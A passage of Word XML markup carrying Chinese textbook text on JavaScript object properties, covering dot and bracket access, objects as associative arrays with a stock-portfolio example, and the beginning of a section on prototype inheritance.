        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章的示例代码中多次用到</w:t>
      </w:r>
      <w:r>
        <w:t>inherit()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>herit()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的其中一个用途就是防止库函数无意间（非恶意地）修改那些不受你控制的对象。不是将对象直接作为参数传入函数，而是将它的继承对象传入函数。当函数读取继承对象的属性时，实际上读取的是继承来的值。如果给继承对象的属性赋值，则这些属性只会影响这个继承对象自身，而不是原始对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={x:"don't change this value"};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>library_function(inherit(o));//</w:t>
      </w:r>
      <w:r>
        <w:t>防止对</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的意外修改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>了解其工作原理，需要首先了解</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中属性的查询和设置机</w:t>
      </w:r>
      <w:r>
        <w:t>制。接下来会讲到。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="6_2_Shu_Xing_De_Cha_Xun_He_She_Zhi_"/>
      <w:r>
        <w:t>6.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　属性的查询和设置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>4.4</w:t>
      </w:r>
      <w:r>
        <w:t>节已经提到，可以通过点</w:t>
      </w:r>
      <w:r>
        <w:t>(.)</w:t>
      </w:r>
      <w:r>
        <w:t>或方括号</w:t>
      </w:r>
      <w:r>
        <w:t>([])</w:t>
      </w:r>
      <w:r>
        <w:t>运算符来获取属性的值。运算符左侧应当是一个表达式，它返回一个对象。对于点</w:t>
      </w:r>
      <w:r>
        <w:t>(.)</w:t>
      </w:r>
      <w:r>
        <w:t>来说，右侧必须是一个以属性名称命名的简单标识符。对于方括号来说</w:t>
      </w:r>
      <w:r>
        <w:t>([])</w:t>
      </w:r>
      <w:r>
        <w:t>，方括号内必须是一个计算结果为字符串的表达式，这个字符串就是属性的名字：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var author=book.author;//</w:t>
      </w:r>
      <w:r>
        <w:t>得到</w:t>
      </w:r>
      <w:r>
        <w:t>book</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>"author"</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var name=author.surname//</w:t>
      </w:r>
      <w:r>
        <w:t>得到获得</w:t>
      </w:r>
      <w:r>
        <w:t>author</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>"surname"</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var t</w:t>
      </w:r>
      <w:r>
        <w:t>itle=book["main title"]//</w:t>
      </w:r>
      <w:r>
        <w:t>得到</w:t>
      </w:r>
      <w:r>
        <w:t>book</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>"main title"</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和查询属性值的写法一样，通过点和方括号也可以创建属性或给属性赋值，但需要将它们放在赋值表达式的左侧：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>book.edition=6;//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>book</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>"edition"</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>book["main title"]="ECMAScript";//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>"main title"</w:t>
      </w:r>
      <w:r>
        <w:t>属性赋值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ECMAScript </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>中，点运算符后的标识符不能是保留字，比如，</w:t>
      </w:r>
      <w:r>
        <w:t>o.for</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>o.class</w:t>
      </w:r>
      <w:r>
        <w:t>是非法的，因为</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的关键字，</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>是保留字。如果一个对象的属性名是保留字，则必须使用方括号的形式访问它们，比如</w:t>
      </w:r>
      <w:r>
        <w:t>o["for"]</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>o["class"]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>对此放宽了限制（包括</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>的某些实现），可以在点运算符后直接使用保留字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当使用方括号时，我们说方括号内的表达式必须返回字符串。其实更严格地讲，表达式必须返回字符串或返回一个可以转换为字符串的值。在第</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>章里有一些例子中的方</w:t>
      </w:r>
      <w:r>
        <w:t>括号内使用了数字，这情况象是非常常见的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="6_2_1_Zuo_Wei_Guan_Lian_Shu_Zu_De_Dui_Xi"/>
      <w:r>
        <w:t>6.2.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　作为关联数组的对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上文提到，下面两个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>表达式的值相同：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>object.property</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>object["property"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第一种语法使用点运算符和一个标识符，这和</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>中访问一个结构体或对象的静态字段非常类似。第二种语法使用方括号和一个字符串，看起来更像数组，只是这个数组元素是通过字符串索引而不是数字索引。这种数组就是我们所说的关联数组（</w:t>
      </w:r>
      <w:r>
        <w:t>associat</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ive array</w:t>
      </w:r>
      <w:r>
        <w:t>），也称做散列、映射或字典（</w:t>
      </w:r>
      <w:r>
        <w:t>dictionary</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象都是关联数组，本节将讨论它的重要性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>和一些强类型</w:t>
      </w:r>
      <w:r>
        <w:t>(strong typed)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>语言中，对象只能拥有固定数目的属性，并且这些属性名称必须提前定义好。由于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是弱类型语言，因此不必遵循这条规定，在任何对象中程序都可以创建任意数量的属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>。但当通过点运算符</w:t>
      </w:r>
      <w:r>
        <w:t>(.)</w:t>
      </w:r>
      <w:r>
        <w:t>访问对象的属性时，属性名用一个标识符来表示。标识符必须直接出现在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中，它们不是数据类型，因此程序无法修改它们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>反过来讲，当通过</w:t>
      </w:r>
      <w:r>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:t>来访问对象的属性时，属</w:t>
      </w:r>
      <w:r>
        <w:t>性名通过字符串来表示。字符串是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的数据类型，在程序运行时可以修改和创建它们。因此，可以在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中使用下面这种代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var addr="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>4;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>addr+=customer["address"+i]+'\n';}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这段代码读取</w:t>
      </w:r>
      <w:r>
        <w:t>customer</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>address0</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>address1</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>address2</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>address3</w:t>
      </w:r>
      <w:r>
        <w:t>属性，并将它们连接起来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个例子主要说明了使用数组写法和用字符串表达式来访问对象属性的灵活性。这段代码也可以通过点运算符来</w:t>
      </w:r>
      <w:r>
        <w:t>重写，但是很多</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>场景只能使用数组写法来完成。假设你正在写一个程序，这个程序利用网络资源计算当前用户股票市场投资的金额。程序允许用户输入每只股票的名称和购股份额。该程序使用名为</w:t>
      </w:r>
      <w:r>
        <w:t>portfolio</w:t>
      </w:r>
      <w:r>
        <w:t>的对象来存储这些信息。每只股票在这个对象中都有对应的属性，属性名称就是股票名称，属性值就是购股数量，例如，如果用户持有</w:t>
      </w:r>
      <w:r>
        <w:t>IBM</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>50</w:t>
      </w:r>
      <w:r>
        <w:t>股，那么</w:t>
      </w:r>
      <w:r>
        <w:t>portfolio.ibm</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值就为</w:t>
      </w:r>
      <w:r>
        <w:t>50</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面是程序的部分代码，这个函数用来给</w:t>
      </w:r>
      <w:r>
        <w:t>portifolio</w:t>
      </w:r>
      <w:r>
        <w:t>添加新的股票：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function addstock(portfolio,stoc</w:t>
      </w:r>
      <w:r>
        <w:t>kname,shares){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>portfolio[stockname]=shares;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由于用户是在程序运行时输入股票名称，因此在之前无法得知这些股票的名称是什么。而由于在写程序的时候不知道属性名称，因此无法通过点运算符</w:t>
      </w:r>
      <w:r>
        <w:t>(.)</w:t>
      </w:r>
      <w:r>
        <w:t>来访问对象</w:t>
      </w:r>
      <w:r>
        <w:t>portfolio</w:t>
      </w:r>
      <w:r>
        <w:t>的属性。但可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:t>运算符，因为它使用字符串值（字符串值是动态的，可以在运行时更改）而不是标识符（标识符是静态的，必须写死在程序中）作为索引对属性进行访问。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>for/i n</w:t>
      </w:r>
      <w:r>
        <w:t>循环（</w:t>
      </w:r>
      <w:r>
        <w:t>6.5</w:t>
      </w:r>
      <w:r>
        <w:t>节还会进一步介绍）。当使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for/i </w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>循环遍历关联数组时，就可以清晰地体会到</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>的强大之处。下面的例子就是利用</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>计算</w:t>
      </w:r>
      <w:r>
        <w:t>portfolio</w:t>
      </w:r>
      <w:r>
        <w:t>的总计值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getvalue(portfolio){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var total=0.0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(stock in portfolio){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>portfolio</w:t>
      </w:r>
      <w:r>
        <w:t>中的每只股票</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var shares=portfolio[stock];//</w:t>
      </w:r>
      <w:r>
        <w:t>得到每只股票的份额</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var price=getquote(stock);//</w:t>
      </w:r>
      <w:r>
        <w:t>查找股票价格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>total+=shares*price;//</w:t>
      </w:r>
      <w:r>
        <w:t>将结果累加</w:t>
      </w:r>
      <w:r>
        <w:t>至</w:t>
      </w:r>
      <w:r>
        <w:t>total</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return total;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>total</w:t>
      </w:r>
      <w:r>
        <w:t>的值</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143" w:name="6_2_2_Ji_Cheng_"/>
      <w:r>
        <w:t>6.2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　继承</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象具有</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>自有属性</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>own property</w:t>
      </w:r>
      <w:r>
        <w:t>），也有一些属性是从原型对象继承而来的。为了更好地理解这种继承，必须更深入地了解属性访问的细节。本节中的许多示例代码借用了例</w:t>
      </w:r>
      <w:r>
        <w:t>6-1</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>inherit()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，通过给它传入指定原型对象来创建实例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>假设要查询对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中不存在</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，那么将会继续在</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的原型对象中查询属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>。如果原型对象中也没有</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，但这个原型对象也有原型，那么继续在这个原型对象的</w:t>
      </w:r>
      <w:r>
        <w:t>原型上执行查询，直到</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>找到</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>或者查找到一个原型是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>的对象为止。可以看到，对象的原型属性构成了一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>链</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，通过这个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>链</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>可以实现属性的继承。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={}//o</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>继承对象的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.x=1;//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p=inherit(o);//p</w:t>
      </w:r>
      <w:r>
        <w:t>继承</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>p.y=2;//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
